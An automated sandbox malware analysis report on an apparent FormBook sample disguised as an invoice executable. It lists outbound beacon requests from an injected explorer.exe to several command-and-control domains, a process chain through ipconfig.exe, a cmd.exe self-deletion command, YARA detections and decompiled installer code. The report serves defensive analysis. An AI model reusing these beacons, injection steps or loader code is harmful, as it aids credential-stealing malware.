74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 Data Ascii: 112c<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf
Jan 28, 2022 13:43:26.629290104 CET	1734	IN	Data Raw: 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 2c 70 72 6f 6a 65 63 74 69 6f 6e 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 Data Ascii: .errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]--><style type="text/css">bod
Jan 28, 2022 13:43:26.629317999 CET	1736	IN	Data Raw: 20 61 73 20 70 68 69 73 68 69 6e 67 2e 20 50 68 69 73 68 69 6e 67 20 69 73 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 61 63 71 75 69 72 65 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 Data Ascii: as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET">
Jan 28, 2022 13:43:26.629342079 CET	1737	IN	Data Raw: 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d Data Ascii: </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-ite
Jan 28, 2022 13:43:26.629359961 CET	1737	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49792	160.153.136.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 13:43:36.863276958 CET	9374	OUT	GET /cxep/?oL08qf=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQM++WQWQx0o&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.mmfirewood.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 13:43:36.892522097 CET	9375	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49794	52.6.230.169	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 13:43:47.222440958 CET	10150	OUT	GET /cxep/?oL08qf=UgSNVuZrhE3Z8z0ZgFZcy2vBLKCwBFY+sTDX0qorCT9gsCOpfKa0UREUH3qfIqk5g45k&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.simonhaidomous.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 13:43:47.363614082 CET	10151	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 28 Jan 2022 12:43:47 GMT Content-Length: 0 Connection: close Location: https://www.houstoncc.com/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49795	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 13:43:52.418301105 CET	10152	OUT	GET /cxep/?oL08qf=ptEMQJ9wcGHn8Y3e8b7dTbimCX2/D160Z9ziomc9eLzNI2egxKU0hugwHCLO4F78raSg&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.spacebymeghan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 13:43:52.615355968 CET	10152	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Fri, 28 Jan 2022 12:43:52 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49796	212.1.210.76	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 13:43:58.334042072 CET	10153	OUT	GET /cxep/?oL08qf=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hnRLry+JL4w&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.akshayaasri.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 13:43:58.453345060 CET	10154	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Fri, 28 Jan 2022 12:43:58 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteS
Jan 28, 2022 13:43:58.453385115 CET	10154	IN	Data Raw: 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f Data Ascii: peed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49800	154.212.212.21	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 13:44:03.940445900 CET	10195	OUT	GET /cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.morethanmummies.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 13:44:04.557204962 CET	10195	OUT	GET /cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.morethanmummies.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: HIRE SOA FOR DEC_2021.exePID: 7124, Parent PID: 5052

General

Target ID:	1
Start time:	13:42:08
Start date:	28/01/2022
Path:	C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Imagebase:	0x400000
File size:	253198 bytes
MD5 hash:	D8AF2363D5A46336733B6121C0B4CF0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: HIRE SOA FOR DEC_2021.exePID: 4744, Parent PID: 7124

General

Target ID:	3
Start time:	13:42:10
Start date:	28/01/2022
Path:	C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Imagebase:	0x400000
File size:	253198 bytes
MD5 hash:	D8AF2363D5A46336733B6121C0B4CF0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3424, Parent PID: 4744

General

Target ID:	5
Start time:	13:42:15
Start date:	28/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ipconfig.exePID: 5252, Parent PID: 3424

General

Target ID:	8
Start time:	13:42:37
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0x280000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5744, Parent PID: 5252

General

Target ID:	9
Start time:	13:42:43
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5736, Parent PID: 5744

General

Target ID:	10
Start time:	13:42:46
Start date:	28/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: HIRE SOA FOR DEC_2021.exePID: 7124, Parent PID: 5052COMMON

Execution Graph

Execution Coverage:	20.1%
Dynamic/Decrypted Code Coverage:	6.8%
Signature Coverage:	22.7%
Total number of Nodes:	1345
Total number of Limit Nodes:	33

Executed Functions

Function 00403225 Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\HIRE SOA FOR DEC_2021.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\HIRE SOA FOR DEC_2021.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
